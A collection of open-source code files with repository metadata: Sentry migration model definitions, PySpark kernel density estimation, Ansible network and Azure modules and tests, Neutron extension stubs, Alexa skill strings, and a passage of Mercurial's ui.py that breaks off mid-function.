'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key', 'value'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'project_set'", 'to': "orm['auth.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
| bsd-3-clause |
skonto/spark | python/pyspark/mllib/stat/KernelDensity.py | 118 | 1997 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
if sys.version > '3':
xrange = range
import numpy as np
from pyspark.mllib.common import callMLlibFunc
from pyspark.rdd import RDD
class KernelDensity(object):
"""
Estimate probability density at required points given an RDD of samples
from the population.
>>> kd = KernelDensity()
>>> sample = sc.parallelize([0.0, 1.0])
>>> kd.setSample(sample)
>>> kd.estimate([0.0, 1.0])
array([ 0.12938758, 0.12938758])
"""
def __init__(self):
self._bandwidth = 1.0
self._sample = None
def setBandwidth(self, bandwidth):
"""Set bandwidth of each sample. Defaults to 1.0"""
self._bandwidth = bandwidth
def setSample(self, sample):
"""Set sample points from the population. Should be a RDD"""
if not isinstance(sample, RDD):
raise TypeError("samples should be a RDD, received %s" % type(sample))
self._sample = sample
def estimate(self, points):
"""Estimate the probability density at points"""
points = list(points)
densities = callMLlibFunc(
"estimateKernelDensity", self._sample, self._bandwidth, points)
return np.asarray(densities)
| apache-2.0 |
kvar/ansible | test/units/modules/network/cnos/test_cnos_logging.py | 23 | 2268 | #
# (c) 2018 Red Hat Inc.
# Copyright (C) 2017 Lenovo.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.cnos import cnos_logging
from units.modules.utils import set_module_args
from .cnos_module import TestCnosModule, load_fixture
class TestCnosLoggingModule(TestCnosModule):
module = cnos_logging
def setUp(self):
super(TestCnosLoggingModule, self).setUp()
self.mock_get_config = patch('ansible.modules.network.cnos.cnos_logging.get_config')
self.get_config = self.mock_get_config.start()
self.mock_load_config = patch('ansible.modules.network.cnos.cnos_logging.load_config')
self.load_config = self.mock_load_config.start()
def tearDown(self):
super(TestCnosLoggingModule, self).tearDown()
self.mock_get_config.stop()
self.mock_load_config.stop()
def load_fixtures(self, commands=None):
self.get_config.return_value = load_fixture('cnos_logging_config.cfg')
self.load_config.return_value = None
def test_cnos_logging_buffer_size_changed_implicit(self):
set_module_args(dict(dest='logfile', name='anil'))
commands = ['logging logfile anil 5 size 10485760']
self.execute_module(changed=True, commands=commands)
def test_cnos_logging_logfile_size_changed_explicit(self):
set_module_args(dict(dest='logfile', name='anil', level='4', size=6000))
commands = ['logging logfile anil 4 size 6000']
self.execute_module(changed=True, commands=commands)
| gpl-3.0 |
eayunstack/neutron | neutron/tests/unit/extension_stubs.py | 5 | 2334 | # Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from neutron_lib.api import extensions as api_extensions
from neutron_lib.services import base
from neutron import wsgi
class StubExtension(api_extensions.ExtensionDescriptor):
def __init__(self, alias="stub_extension", optional=None):
self.alias = alias
self.optional = optional or []
def get_name(self):
return "Stub Extension"
def get_alias(self):
return self.alias
def get_description(self):
return ""
def get_updated(self):
return ""
def get_optional_extensions(self):
return self.optional
class StubExtensionWithReqs(StubExtension):
def get_required_extensions(self):
return ["foo"]
class StubPlugin(object):
def __init__(self, supported_extensions=None):
supported_extensions = supported_extensions or []
self.supported_extension_aliases = supported_extensions
class ExtensionExpectingPluginInterface(StubExtension):
"""Expect plugin to implement all methods in StubPluginInterface.
This extension expects plugin to implement all the methods defined
in StubPluginInterface.
"""
def get_plugin_interface(self):
return StubPluginInterface
class StubPluginInterface(base.ServicePluginBase):
@abc.abstractmethod
def get_foo(self, bar=None):
pass
def get_plugin_type(self):
pass
def get_plugin_description(self):
pass
class StubBaseAppController(wsgi.Controller):
def index(self, request):
return "base app index"
def show(self, request, id):
return {'fort': 'knox'}
def update(self, request, id):
return {'uneditable': 'original_value'}
| apache-2.0 |
richardcs/ansible | lib/ansible/modules/cloud/azure/azure_rm_virtualnetwork_facts.py | 7 | 5178 | #!/usr/bin/python
#
# Copyright (c) 2016 Matt Davis, <[email protected]>
# Chris Houseknecht, <[email protected]>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_virtualnetwork_facts
version_added: "2.1"
short_description: Get virtual network facts.
description:
- Get facts for a specific virtual network or all virtual networks within a resource group.
options:
name:
description:
- Only show results for a specific security group.
resource_group:
description:
- Limit results by resource group. Required when filtering by name.
tags:
description:
- Limit results by providing a list of tags. Format tags as 'key' or 'key:value'.
extends_documentation_fragment:
- azure
author:
- "Chris Houseknecht (@chouseknecht) <[email protected]>"
- "Matt Davis (@nitzmahone) <[email protected]>"
'''
EXAMPLES = '''
- name: Get facts for one virtual network
azure_rm_virtualnetwork_facts:
resource_group: Testing
name: secgroup001
- name: Get facts for all virtual networks
azure_rm_virtualnetwork_facts:
resource_group: Testing
- name: Get facts by tags
azure_rm_virtualnetwork_facts:
tags:
- testing
'''
RETURN = '''
azure_virtualnetworks:
description: List of virtual network dicts.
returned: always
type: list
example: [{
"etag": 'W/"532ba1be-ae71-40f2-9232-3b1d9cf5e37e"',
"id": "/subscriptions/XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX/resourceGroups/Testing/providers/Microsoft.Network/virtualNetworks/vnet2001",
"location": "eastus2",
"name": "vnet2001",
"properties": {
"addressSpace": {
"addressPrefixes": [
"10.10.0.0/16"
]
},
"provisioningState": "Succeeded",
"resourceGuid": "a7ba285f-f7e7-4e17-992a-de4d39f28612",
"subnets": []
},
"type": "Microsoft.Network/virtualNetworks"
}]
'''
try:
from msrestazure.azure_exceptions import CloudError
except:
# This is handled in azure_rm_common
pass
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
AZURE_OBJECT_CLASS = 'VirtualNetwork'
class AzureRMNetworkInterfaceFacts(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
name=dict(type='str'),
resource_group=dict(type='str'),
tags=dict(type='list'),
)
self.results = dict(
changed=False,
ansible_facts=dict(azure_virtualnetworks=[])
)
self.name = None
self.resource_group = None
self.tags = None
super(AzureRMNetworkInterfaceFacts, self).__init__(self.module_arg_spec,
supports_tags=False,
facts_module=True)
def exec_module(self, **kwargs):
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
if self.name is not None:
self.results['ansible_facts']['azure_virtualnetworks'] = self.get_item()
else:
self.results['ansible_facts']['azure_virtualnetworks'] = self.list_items()
return self.results
def get_item(self):
self.log('Get properties for {0}'.format(self.name))
item = None
results = []
try:
item = self.network_client.virtual_networks.get(self.resource_group, self.name)
except CloudError:
pass
if item and self.has_tags(item.tags, self.tags):
results = [self.serialize_obj(item, AZURE_OBJECT_CLASS)]
return results
def list_resource_group(self):
self.log('List items for resource group')
try:
response = self.network_client.virtual_networks.list(self.resource_group)
except CloudError as exc:
self.fail("Failed to list for resource group {0} - {1}".format(self.resource_group, str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def list_items(self):
self.log('List all for items')
try:
response = self.network_client.virtual_networks.list_all()
except CloudError as exc:
self.fail("Failed to list all items - {0}".format(str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def main():
AzureRMNetworkInterfaceFacts()
if __name__ == '__main__':
main()
| gpl-3.0 |
benvand/alexa-stackoverflow | strings.py | 1 | 1340 | """Strings for Alexa to say"""
from settings import SITE_NAME_SPEAKABLE
SITE_NAME = SITE_NAME_SPEAKABLE
# Breaks
BREAK = '<break strength="{strength}">'
XS_BREAK = BREAK.format(strength='x-strong')
S_BREAK = BREAK.format(strength='strong')
# Greet and dismiss
WELCOME_REPROMPT = \
"""
You can ask {site_name} for an answer to a question.
For example, try, Ask {site_name}{break1} what is node j s.
""".format(site_name=SITE_NAME, break1=S_BREAK)
WELCOME = ("Welcome to the Alexa {site_name} Skill. " + WELCOME_REPROMPT).format(site_name=SITE_NAME)
GOODBYE = "Thank you for trying the Alexa {site_name} app.".format(site_name=SITE_NAME)
# Report of what has been found
REPORT_ON_QUESTION = "The closest question match on " + SITE_NAME + ' is {question}...'
REPORT_ON_ANSWER = "The top rated answer for that question by {answerer} with {votes} upvotes is {answer}."
REPORT = S_BREAK.join([REPORT_ON_QUESTION, REPORT_ON_ANSWER])
# Failure to parse and reprompt
FAILURE = "I'm sorry, I didn't catch your question. Please try again."
PROMPT_ASK = "Your questions will be relayed to {site_name}.".format(site_name=SITE_NAME)
# Nothing found responses
NO_QUESTIONS = "I'm sorry, that didn't return any results on {site_name}.".format(site_name=SITE_NAME)
NO_ANSWERS = NO_QUESTIONS + "However there is a question waiting to be answered."
| mit |
seewindcn/tortoisehg | src/mercurial/ui.py | 1 | 45732 | # ui.py - user interface bits for mercurial
#
# Copyright 2005-2007 Matt Mackall <[email protected]>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import errno
import getpass
import inspect
import os
import re
import socket
import sys
import tempfile
import traceback
from .i18n import _
from .node import hex
from . import (
config,
error,
formatter,
progress,
scmutil,
util,
)
samplehgrcs = {
'user':
"""# example user config (see "hg help config" for more info)
[ui]
# name and email, e.g.
# username = Jane Doe <[email protected]>
username =
[extensions]
# uncomment these lines to enable some popular extensions
# (see "hg help extensions" for more info)
#
# pager =
# progress =
# color =""",
'cloned':
"""# example repository config (see "hg help config" for more info)
[paths]
default = %s
# path aliases to other clones of this repo in URLs or filesystem paths
# (see "hg help config.paths" for more info)
#
# default-push = ssh://[email protected]/hg/jdoes-fork
# my-fork = ssh://[email protected]/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone
[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <[email protected]>
""",
'local':
"""# example repository config (see "hg help config" for more info)
[paths]
# path aliases to other clones of this repo in URLs or filesystem paths
# (see "hg help config.paths" for more info)
#
# default = http://example.com/hg/example-repo
# default-push = ssh://[email protected]/hg/jdoes-fork
# my-fork = ssh://[email protected]/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone
[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <[email protected]>
""",
'global':
"""# example system-wide hg config (see "hg help config" for more info)
[extensions]
# uncomment these lines to enable some popular extensions
# (see "hg help extensions" for more info)
#
# blackbox =
# progress =
# color =
# pager =""",
}
class ui(object):
def __init__(self, src=None):
# _buffers: used for temporary capture of output
self._buffers = []
# 3-tuple describing how each buffer in the stack behaves.
# Values are (capture stderr, capture subprocesses, apply labels).
self._bufferstates = []
# When a buffer is active, defines whether we are expanding labels.
# This exists to prevent an extra list lookup.
self._bufferapplylabels = None
self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
self._reportuntrusted = True
self._ocfg = config.config() # overlay
self._tcfg = config.config() # trusted
self._ucfg = config.config() # untrusted
self._trustusers = set()
self._trustgroups = set()
self.callhooks = True
if src:
self.fout = src.fout
self.ferr = src.ferr
self.fin = src.fin
self._tcfg = src._tcfg.copy()
self._ucfg = src._ucfg.copy()
self._ocfg = src._ocfg.copy()
self._trustusers = src._trustusers.copy()
self._trustgroups = src._trustgroups.copy()
self.environ = src.environ
self.callhooks = src.callhooks
self.fixconfig()
else:
self.fout = sys.stdout
self.ferr = sys.stderr
self.fin = sys.stdin
# shared read-only environment
self.environ = os.environ
# we always trust global config files
for f in scmutil.rcpath():
self.readconfig(f, trust=True)
def copy(self):
return self.__class__(self)
def formatter(self, topic, opts):
return formatter.formatter(self, topic, opts)
def _trusted(self, fp, f):
st = util.fstat(fp)
if util.isowner(st):
return True
tusers, tgroups = self._trustusers, self._trustgroups
if '*' in tusers or '*' in tgroups:
return True
user = util.username(st.st_uid)
group = util.groupname(st.st_gid)
if user in tusers or group in tgroups or user == util.username():
return True
if self._reportuntrusted:
self.warn(_('not trusting file %s from untrusted '
'user %s, group %s\n') % (f, user, group))
return False
def readconfig(self, filename, root=None, trust=False,
sections=None, remap=None):
try:
fp = open(filename)
except IOError:
if not sections: # ignore unless we were looking for something
return
raise
cfg = config.config()
trusted = sections or trust or self._trusted(fp, filename)
try:
cfg.read(filename, fp, sections=sections, remap=remap)
fp.close()
except error.ConfigError as inst:
if trusted:
raise
self.warn(_("ignored: %s\n") % str(inst))
if self.plain():
for k in ('debug', 'fallbackencoding', 'quiet', 'slash',
'logtemplate', 'statuscopies', 'style',
'traceback', 'verbose'):
if k in cfg['ui']:
del cfg['ui'][k]
for k, v in cfg.items('defaults'):
del cfg['defaults'][k]
# Don't remove aliases from the configuration if in the exceptionlist
if self.plain('alias'):
for k, v in cfg.items('alias'):
del cfg['alias'][k]
if self.plain('revsetalias'):
for k, v in cfg.items('revsetalias'):
del cfg['revsetalias'][k]
if trusted:
self._tcfg.update(cfg)
self._tcfg.update(self._ocfg)
self._ucfg.update(cfg)
self._ucfg.update(self._ocfg)
if root is None:
root = os.path.expanduser('~')
self.fixconfig(root=root)
def fixconfig(self, root=None, section=None):
if section in (None, 'paths'):
# expand vars and ~
# translate paths relative to root (or home) into absolute paths
root = root or os.getcwd()
for c in self._tcfg, self._ucfg, self._ocfg:
for n, p in c.items('paths'):
if not p:
continue
if '%%' in p:
self.warn(_("(deprecated '%%' in path %s=%s from %s)\n")
% (n, p, self.configsource('paths', n)))
p = p.replace('%%', '%')
p = util.expandpath(p)
if not util.hasscheme(p) and not os.path.isabs(p):
p = os.path.normpath(os.path.join(root, p))
c.set("paths", n, p)
if section in (None, 'ui'):
# update ui options
self.debugflag = self.configbool('ui', 'debug')
self.verbose = self.debugflag or self.configbool('ui', 'verbose')
self.quiet = not self.debugflag and self.configbool('ui', 'quiet')
if self.verbose and self.quiet:
self.quiet = self.verbose = False
self._reportuntrusted = self.debugflag or self.configbool("ui",
"report_untrusted", True)
self.tracebackflag = self.configbool('ui', 'traceback', False)
if section in (None, 'trusted'):
# update trust information
self._trustusers.update(self.configlist('trusted', 'users'))
self._trustgroups.update(self.configlist('trusted', 'groups'))
def backupconfig(self, section, item):
return (self._ocfg.backup(section, item),
self._tcfg.backup(section, item),
self._ucfg.backup(section, item),)
def restoreconfig(self, data):
self._ocfg.restore(data[0])
self._tcfg.restore(data[1])
self._ucfg.restore(data[2])
def setconfig(self, section, name, value, source=''):
for cfg in (self._ocfg, self._tcfg, self._ucfg):
cfg.set(section, name, value, source)
self.fixconfig(section=section)
def _data(self, untrusted):
return untrusted and self._ucfg or self._tcfg
def configsource(self, section, name, untrusted=False):
return self._data(untrusted).source(section, name) or 'none'
def config(self, section, name, default=None, untrusted=False):
if isinstance(name, list):
alternates = name
else:
alternates = [name]
for n in alternates:
value = self._data(untrusted).get(section, n, None)
if value is not None:
name = n
break
else:
value = default
if self.debugflag and not untrusted and self._reportuntrusted:
for n in alternates:
uvalue = self._ucfg.get(section, n)
if uvalue is not None and uvalue != value:
self.debug("ignoring untrusted configuration option "
"%s.%s = %s\n" % (section, n, uvalue))
return value
def configsuboptions(self, section, name, default=None, untrusted=False):
"""Get a config option and all sub-options.
Some config options have sub-options that are declared with the
format "key:opt = value". This method is used to return the main
option and all its declared sub-options.
Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
is a dict of defined sub-options where keys and values are strings.
"""
data = self._data(untrusted)
main = data.get(section, name, default)
if self.debugflag and not untrusted and self._reportuntrusted:
uvalue = self._ucfg.get(section, name)
if uvalue is not None and uvalue != main:
self.debug('ignoring untrusted configuration option '
'%s.%s = %s\n' % (section, name, uvalue))
sub = {}
prefix = '%s:' % name
for k, v in data.items(section):
if k.startswith(prefix):
sub[k[len(prefix):]] = v
if self.debugflag and not untrusted and self._reportuntrusted:
for k, v in sub.items():
uvalue = self._ucfg.get(section, '%s:%s' % (name, k))
if uvalue is not None and uvalue != v:
self.debug('ignoring untrusted configuration option '
'%s:%s.%s = %s\n' % (section, name, k, uvalue))
return main, sub
def configpath(self, section, name, default=None, untrusted=False):
'get a path config item, expanded relative to repo root or config file'
v = self.config(section, name, default, untrusted)
if v is None:
return None
if not os.path.isabs(v) or "://" not in v:
src = self.configsource(section, name, untrusted)
if ':' in src:
base = os.path.dirname(src.rsplit(':')[0])
v = os.path.join(base, os.path.expanduser(v))
return v
def configbool(self, section, name, default=False, untrusted=False):
"""parse a configuration element as a boolean
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'true', 'yes')
>>> u.configbool(s, 'true')
True
>>> u.setconfig(s, 'false', 'no')
>>> u.configbool(s, 'false')
False
>>> u.configbool(s, 'unknown')
False
>>> u.configbool(s, 'unknown', True)
True
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configbool(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not a boolean ('somevalue')
"""
v = self.config(section, name, None, untrusted)
if v is None:
return default
if isinstance(v, bool):
return v
b = util.parsebool(v)
if b is None:
raise error.ConfigError(_("%s.%s is not a boolean ('%s')")
% (section, name, v))
return b
def configint(self, section, name, default=None, untrusted=False):
"""parse a configuration element as an integer
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'int1', '42')
>>> u.configint(s, 'int1')
42
>>> u.setconfig(s, 'int2', '-42')
>>> u.configint(s, 'int2')
-42
>>> u.configint(s, 'unknown', 7)
7
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configint(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not an integer ('somevalue')
"""
v = self.config(section, name, None, untrusted)
if v is None:
return default
try:
return int(v)
except ValueError:
raise error.ConfigError(_("%s.%s is not an integer ('%s')")
% (section, name, v))
def configbytes(self, section, name, default=0, untrusted=False):
"""parse a configuration element as a quantity in bytes
Units can be specified as b (bytes), k or kb (kilobytes), m or
mb (megabytes), g or gb (gigabytes).
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'val1', '42')
>>> u.configbytes(s, 'val1')
42
>>> u.setconfig(s, 'val2', '42.5 kb')
>>> u.configbytes(s, 'val2')
43520
>>> u.configbytes(s, 'unknown', '7 MB')
7340032
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configbytes(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not a byte quantity ('somevalue')
"""
value = self.config(section, name)
if value is None:
if not isinstance(default, str):
return default
value = default
try:
return util.sizetoint(value)
except error.ParseError:
raise error.ConfigError(_("%s.%s is not a byte quantity ('%s')")
% (section, name, value))
def configlist(self, section, name, default=None, untrusted=False):
"""parse a configuration element as a list of comma/space separated
strings
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'list1', 'this,is "a small" ,test')
>>> u.configlist(s, 'list1')
['this', 'is', 'a small', 'test']
"""
def _parse_plain(parts, s, offset):
whitespace = False
while offset < len(s) and (s[offset].isspace() or s[offset] == ','):
whitespace = True
offset += 1
if offset >= len(s):
return None, parts, offset
if whitespace:
parts.append('')
if s[offset] == '"' and not parts[-1]:
return _parse_quote, parts, offset + 1
elif s[offset] == '"' and parts[-1][-1] == '\\':
